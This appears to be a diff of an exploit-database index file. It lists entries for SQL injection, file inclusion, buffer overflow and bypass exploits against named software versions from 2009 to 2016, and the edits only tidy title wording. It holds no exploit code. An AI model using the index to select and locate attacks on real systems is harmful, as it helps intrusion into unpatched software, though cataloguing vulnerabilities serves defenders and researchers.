10165,platforms/php/webapps/10165.txt,"TelebidAuctionScript - (aid) Blind SQL Injection",2009-11-17,"Hussin X",php,webapps,0 -10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - (default.asp) Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 +10166,platforms/asp/webapps/10166.txt,"ActiveTrade 2.0 - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10167,platforms/asp/webapps/10167.txt,"ActiveBids - 'default.asp' Blind SQL Injection",2009-11-17,"Hussin X",asp,webapps,0 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 - HTML / Cross-Site Scripting Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 @@ -9513,7 +9514,7 @@ id,file,description,date,author,platform,type,port 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 40301,platforms/php/dos/40301.php,"PHP 5.0.0 - 'domxml_open_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 40302,platforms/php/dos/40302.php,"PHP 7.0 - Object Cloning Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 -40303,platforms/cgi/webapps/40303.sh,"INTELLINET IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",cgi,webapps,80 +40303,platforms/cgi/webapps/40303.sh,"Intellinet IP Camera INT-L100M20N - Unauthorized Admin Credential Change",2016-08-29,"Todor Donev",cgi,webapps,80 40304,platforms/cgi/webapps/40304.txt,"PLC Wireless Router GPN2.4P21-C-CN - Arbitrary File Disclosure",2016-08-29,"Rahul Raz",cgi,webapps,80 40305,platforms/php/dos/40305.txt,"PHP 5.0.0 - 'simplexml_load_file()' Local Denial of Service",2016-08-29,"Yakir Wizman",php,dos,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 @@ -9530,7 +9531,7 @@ id,file,description,date,author,platform,type,port 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"Wordpress WP-Cumulus 1.20 Plugin - Exploit",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 Plugin - Exploit",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 - Arbitrary File Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 @@ -9543,7 +9544,7 @@ id,file,description,date,author,platform,type,port 10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 File Hosting Script - Arbitrary File Upload",2009-11-28,DigitALL,php,webapps,0 -10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'multipart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 +10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service (Python)",2009-11-27,Eren,php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service (PoC)",2009-11-22,"Bogdan Calin",php,dos,0 10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 10245,platforms/php/webapps/10245.txt,"phpBazar 2.1.1fix - 'cid' SQL Injection",2009-11-28,MizoZ,php,webapps,0 @@ -9561,7 +9562,7 @@ id,file,description,date,author,platform,type,port 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 10259,platforms/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MySQL Scripts - Authentication Bypass",2009-12-01,DUNDEE,php,webapps,0 -10261,platforms/linux/webapps/10261.txt,"DotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 +10261,platforms/linux/webapps/10261.txt,"dotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 10263,platforms/linux/webapps/10263.txt,"quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -9575,7 +9576,7 @@ id,file,description,date,author,platform,type,port 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum - Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - Cross-Site Scripting / AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 -10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 +10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion",2009-12-03,"cr4wl3r ",php,webapps,0 10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist '.pls' Unicode Buffer Overflow",2009-11-21,mr_me,windows,local,0 10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow",2009-12-03,pyrokinesis,windows,local,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String Exploit",2009-12-03,"Patroklos Argyroudis",linux,remote,80 @@ -9598,52 +9599,52 @@ id,file,description,date,author,platform,type,port 10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection",2009-12-04,"cr4wl3r ",php,webapps,0 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / 3.0.4 / 2.3.6 - Local File Inclusion / SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 -10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 +10305,platforms/php/webapps/10305.txt,"UBB.Threads 7.5.4 2 - Multiple File Inclusion",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 - Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 10312,platforms/php/webapps/10312.php,"Joomla 1.5.x - com_joomgallery&func Incorrect Flood Filter",2009-12-04,Jbyte,php,webapps,0 -10313,platforms/linux/local/10313.c,"libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 +10313,platforms/linux/local/10313.c,"Libmodplug - 's3m' Remote Buffer Overflow",2008-02-25,dummy,linux,local,0 10314,platforms/php/webapps/10314.txt,"BM Classifieds Ads - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10318,platforms/php/webapps/10318.txt,"Joomla yt_color YOOOtheme - Cross-Site Scripting / Cookie Stealing",2009-12-04,andresg888,php,webapps,80 10319,platforms/windows/local/10319.py,"IDEAL Administration 2009 9.7 - Local Buffer Overflow",2009-12-05,Dr_IDE,windows,local,0 10320,platforms/windows/local/10320.py,"M3U To ASX-WPL 1.1 - '.m3u' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 -10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (1)",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 +10321,platforms/windows/local/10321.py,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (1)",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10322,platforms/windows/local/10322.py,"Audacity 1.2.6 - '.gro' Buffer Overflow",2009-12-05,"Encrypt3d.M!nd ",windows,local,0 10323,platforms/windows/local/10323.py,"HTML Help Workshop 4.74 - (hhp) Buffer Overflow (Universal)",2009-12-05,Dz_attacker,windows,local,0 10324,platforms/php/webapps/10324.txt,"phpshop 0.8.1 - Multiple Vulnerabilities",2009-12-05,"Andrea Fabrizi",php,webapps,0 -10325,platforms/php/webapps/10325.txt,"Wordpress Image Manager Plugins - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 +10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - Arbitrary File Upload",2009-12-05,DigitALL,php,webapps,0 10326,platforms/multiple/local/10326.txt,"Ghostscript < 8.64 - 'gdevpdtb.c' Buffer Overflow",2009-02-03,"Wolfgang Hamann",multiple,local,0 10327,platforms/multiple/dos/10327.txt,"Ghostscript 'CCITTFax' Decoding Filter - Denial of Service",2009-04-01,"Red Hat",multiple,dos,0 -10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion Exploit",2009-12-06,"cr4wl3r ",php,webapps,0 -10330,platforms/php/webapps/10330.txt,"elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 -10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Transversal",2009-12-06,mr_me,windows,webapps,0 +10329,platforms/php/webapps/10329.txt,"AROUNDMe 1.1 - (language_path) Remote File Inclusion",2009-12-06,"cr4wl3r ",php,webapps,0 +10330,platforms/php/webapps/10330.txt,"Elkagroup - SQL Injection",2009-12-06,SadHaCkEr,php,webapps,0 +10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10332,platforms/windows/local/10332.rb,"IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit)",2009-12-06,dookie,windows,local,0 10333,platforms/windows/dos/10333.py,"VLC Media Player 1.0.3 - smb:// URI Handling Remote Stack Overflow (PoC)",2009-12-06,Dr_IDE,windows,dos,0 -10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 (OSX/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos,0 -10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 -10337,platforms/php/webapps/10337.txt,"Chipmunk Newsletter - Persistant Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 +10334,platforms/multiple/dos/10334.py,"VLC Media Player 1.0.3 (OS X/Linux) - RTSP Buffer Overflow (PoC)",2009-12-06,Dr_IDE,multiple,dos,0 +10335,platforms/windows/local/10335.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 +10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 10338,platforms/linux/dos/10338.pl,"Polipo 1.0.4 - Remote Memory Corruption (PoC)",2009-12-07,"Jeremy Brown",linux,dos,0 10339,platforms/windows/local/10339.pl,"gAlan 0.2.1 - Buffer Overflow (1)",2009-12-07,"Jeremy Brown",windows,local,0 10340,platforms/windows/remote/10340.pl,"Multiple Symantec Products - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0 -10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion Exploit",2009-12-07,"cr4wl3r ",php,webapps,0 +10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusion",2009-12-07,"cr4wl3r ",php,webapps,0 10343,platforms/windows/dos/10343.txt,"Kingsoft Internet Security 9 - Denial of Services",2009-11-05,"Francis Provencher",windows,dos,0 10344,platforms/windows/local/10344.rb,"Adobe Illustrator CS4 14.0.0 - eps Universal Buffer Overflow (Metasploit)",2009-12-07,dookie,windows,local,0 10345,platforms/windows/local/10345.py,"gAlan - '.galan' Universal Buffer Overflow",2009-12-07,Dz_attacker,windows,local,0 10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow (Metasploit)",2009-12-07,loneferret,windows,local,0 10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Exploit",2009-12-07,Global-Evolution,hardware,webapps,0 10349,platforms/linux/dos/10349.py,"CoreHTTP Web server 0.5.3.1 - Off-by-One Buffer Overflow",2009-12-02,"Patroklos Argyroudis",linux,dos,80 -10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group - SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0 10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0 10353,platforms/windows/local/10353.pl,"Audio Workstation - '.pls' Local Buffer Overflow (SEH)",2009-09-24,germaya_x,windows,local,0 -10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistant Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0 +10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0 10356,platforms/php/webapps/10356.txt,"Joomla Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0 10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0 10359,platforms/windows/local/10359.py,"Audio Workstation 6.4.2.4.0 - '.pls' Universal Local Buffer Overflow Exploit",2009-12-09,mr_me,windows,local,0 10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0 10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - (user.ini) Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0 -10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - .pls Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 +10363,platforms/windows/local/10363.rb,"Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,local,0 10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit)",2009-12-09,dookie,windows,remote,0 10366,platforms/php/webapps/10366.txt,"Joomla Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0 @@ -9651,20 +9652,20 @@ id,file,description,date,author,platform,type,port 10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0 10369,platforms/php/webapps/10369.txt,"Joomla! Mamboleto Component 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0 10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass SQL Injection",2009-12-10,mr_me,php,webapps,0 -10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0 +10371,platforms/windows/local/10371.pl,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (1)",2009-12-10,germaya_x,windows,local,0 10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0 -10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 +10373,platforms/windows/local/10373.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (Metasploit)",2009-12-10,"loneferret germaya_x",windows,local,0 10374,platforms/windows/local/10374.pl,"Easy RM to MP3 Converter 2.7.3.700 - Exploit",2009-12-10,"Vinod Sharma",windows,local,0 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - sapirrfc.dll ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0 10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80 10377,platforms/windows/dos/10377.txt,"IBM SolidDB - Invalid Error Code",2009-11-18,"Core Security",windows,dos,2315 10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0 -10379,platforms/php/webapps/10379.txt,"oBlog - Persistant Cross-Site Scripting / Cross-Site Request Forgery / Admin Bruteforce",2009-12-11,"Milos Zivanovic ",php,webapps,0 +10379,platforms/php/webapps/10379.txt,"oBlog - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Brute Force",2009-12-11,"Milos Zivanovic ",php,webapps,0 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0 10383,platforms/php/webapps/10383.txt,"Digital Scribe 1.4.1 - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps,0 10384,platforms/php/webapps/10384.txt,"E-Store - SQL Injection",2009-12-11,"Salvatore Fresta",php,webapps,0 10386,platforms/solaris/webapps/10386.txt,"Sun Solaris AnswerBook2 - Multiple Cross-Site Scripting",2005-05-07,"Thomas Liam Romanis",solaris,webapps,0 -10388,platforms/php/webapps/10388.txt,"Chipmunk Newsletter - Cross-Site Request Forgery",2009-12-11,"Milos Zivanovic ",php,webapps,0 +10388,platforms/php/webapps/10388.txt,"Chipmunk NewsLetter - Cross-Site Request Forgery",2009-12-11,"Milos Zivanovic ",php,webapps,0 10389,platforms/php/webapps/10389.txt,"Illogator Shop - SQL Injection Bypass",2009-12-11,bi0,php,webapps,0 10390,platforms/php/webapps/10390.txt,"phpCollegeExchange 0.1.5c - Multiple SQL Injections",2009-12-11,"Salvatore Fresta",php,webapps,0 10391,platforms/php/webapps/10391.txt,"XAMPP 1.7.2 - Change Administrative Password",2009-12-11,bi0,php,webapps,0 @@ -9679,15 +9680,15 @@ id,file,description,date,author,platform,type,port 10403,platforms/php/webapps/10403.txt,"Uploadscript 1.0 - Multiple Vulnerabilities",2009-12-13,Mr.aFiR,php,webapps,0 10404,platforms/php/webapps/10404.txt,"Interspire Shopping Cart - Full Path Disclosure",2009-12-13,Mr.aFiR,php,webapps,0 10406,platforms/php/webapps/10406.txt,"AccStatistics 1.1 - Cross-Site Request Forgery (Change Admin Settings)",2009-12-13,"Milos Zivanovic ",php,webapps,0 -10407,platforms/php/webapps/10407.txt,"Joomla Component com_virtuemart 1.0 - SQL Injection (product_id)",2009-12-13,"SOA Crew",php,webapps,0 +10407,platforms/php/webapps/10407.txt,"Joomla Component com_virtuemart 1.0 - SQL Injection (Product_ID)",2009-12-13,"SOA Crew",php,webapps,0 10408,platforms/php/webapps/10408.txt,"SpireCMS 2.0 - SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10410,platforms/php/webapps/10410.txt,"phpldapadmin - Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 +10410,platforms/php/webapps/10410.txt,"phpLDAPadmin - Local File Inclusion",2009-12-10,ipsecs,php,webapps,0 10412,platforms/php/webapps/10412.txt,"Acc PHP eMail 1.1 - Cross-Site Request Forgery",2009-12-13,bi0,php,webapps,0 10414,platforms/php/webapps/10414.txt,"Frog CMS 0.9.5 - Cross-Site Request Forgery",2009-12-13,"Milos Zivanovic ",php,webapps,0 10417,platforms/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,php,webapps,0 10418,platforms/php/webapps/10418.txt,"Ele Medios CMS - SQL Injection",2009-12-13,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10419,platforms/php/webapps/10419.txt,"Chipmunk Board Script 1.x - Multiple Cross-Site Request Forgery Vulnerabilities",2009-12-13,"Milos Zivanovic ",php,webapps,0 -10420,platforms/php/webapps/10420.txt,"Ez GuestBook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 +10420,platforms/php/webapps/10420.txt,"Ez Guestbook 1.0 - Multiple Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0 10421,platforms/php/webapps/10421.txt,"Automne.ws CMS 4.0.0rc2 - Multiple Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10422,platforms/php/webapps/10422.txt,"eoCMS 0.9.03 - Remote File Inclusion",2009-12-14,"1nd0n3s14n l4m3r",php,webapps,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Stack Overflow",2009-12-14,"Vinod Sharma",windows,local,0 @@ -9712,7 +9713,7 @@ id,file,description,date,author,platform,type,port 10445,platforms/php/webapps/10445.txt,"Tender System 0.9.5b - Local File Inclusion",2009-12-14,Packetdeath,php,webapps,0 10446,platforms/php/webapps/10446.txt,"WSCreator 1.1 - Blind SQL Injection",2009-12-14,"Salvatore Fresta",php,webapps,0 10447,platforms/php/webapps/10447.txt,"Traidnt Discovery - [Cross-Site Request Forgery] Create Staff Account",2009-12-14,G0D-F4Th3r,php,webapps,0 -10448,platforms/multiple/webapps/10448.txt,"Oracle e-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 +10448,platforms/multiple/webapps/10448.txt,"Oracle E-Business Suite - Multiple Vulnerabilities",2009-12-14,Hacktics,multiple,webapps,0 10449,platforms/asp/webapps/10449.txt,"EEGshop 1.2 - SQL Injection",2009-12-15,Securitylab.ir,asp,webapps,0 10450,platforms/php/webapps/10450.txt,"Linkster - PHP/MySQL SQL Injection",2009-12-15,"Angela Zhang",php,webapps,0 10451,platforms/hardware/remote/10451.txt,"HMS HICP Protocol + Intellicom - NetBiterConfig.exe Remote Buffer Overflow",2009-12-14,"Ruben Santamarta ",hardware,remote,0 @@ -9734,9 +9735,9 @@ id,file,description,date,author,platform,type,port 10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - (Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0 10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 -10475,platforms/windows/local/10475.txt,"QuickHeal antivirus 2010 - Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 +10475,platforms/windows/local/10475.txt,"QuickHeal AntiVirus 2010 - Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 10476,platforms/asp/webapps/10476.txt,"RecipePal 1.0 - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 -10478,platforms/php/webapps/10478.txt,"iSupport 1.8 - Cross-Site Scripting / Local File Inclusion Exploit",2009-12-16,"Stink and Essandre",php,webapps,0 +10478,platforms/php/webapps/10478.txt,"iSupport 1.8 - Cross-Site Scripting / Local File Inclusion",2009-12-16,"Stink and Essandre",php,webapps,0 10479,platforms/php/webapps/10479.txt,"OSSIM 2.1.5 - SQL Injection",2009-12-16,"Nahuel Grisolia",php,webapps,0 10480,platforms/php/webapps/10480.txt,"OSSIM 2.1.5 - Remote Command Execution",2009-12-16,"Nahuel Grisolia",php,webapps,0 10481,platforms/php/webapps/10481.txt,"OSSIM 2.1.5 - Arbitrary File Upload",2009-12-16,"Nahuel Grisolia",php,webapps,0 @@ -9744,14 +9745,14 @@ id,file,description,date,author,platform,type,port 10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,"ViRuSMaN ",asp,webapps,0 10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0 10485,platforms/php/webapps/10485.txt,"Drupal Sections Module - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0 -14034,platforms/windows/dos/14034.pl,"Wincalc 2 - (.num) Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 +14034,platforms/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - vccleaner Root",2009-12-16,"Dominick LaTrappe",linux,local,0 10488,platforms/php/webapps/10488.txt,"WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0 10489,platforms/windows/dos/10489.txt,"Google Picasa 3.5 - Local Denial of Service Buffer Overflow",2009-12-16,Connection,windows,dos,0 10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload Vulerability",2009-12-16,Stink',php,webapps,0 +10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0 10496,platforms/asp/webapps/10496.txt,"freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0 @@ -9763,10 +9764,10 @@ id,file,description,date,author,platform,type,port 10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0 10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10507,platforms/asp/webapps/10507.txt,"Charon Cart 3.0 - (ContentID) Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 +10510,platforms/hardware/remote/10510.txt,"Cisco ASA 8.x - VPN SSL module Clientless URL-list control Bypass",2009-12-17,"David Eduardo Acosta Rodriguez",hardware,remote,0 10511,platforms/php/webapps/10511.txt,"PHP F1 Upload - Arbitrary File Upload",2009-12-17,"wlhaan hacker",php,webapps,0 10512,platforms/php/webapps/10512.txt,"Horde 3.3.5 - 'PHP_SELF' Cross-Site Scripting",2009-12-17,"Juan Galiana Lara",php,webapps,0 -10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File Manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 +10513,platforms/windows/webapps/10513.txt,"Sitecore Staging Module 5.4.0 - Authentication Bypass / File manipulation",2009-12-17,"L. Weichselbaum",windows,webapps,0 10514,platforms/windows/webapps/10514.txt,"dblog - 'dblog.mdb' Remote Database Disclosure",2009-12-17,"AnTi SeCuRe",windows,webapps,0 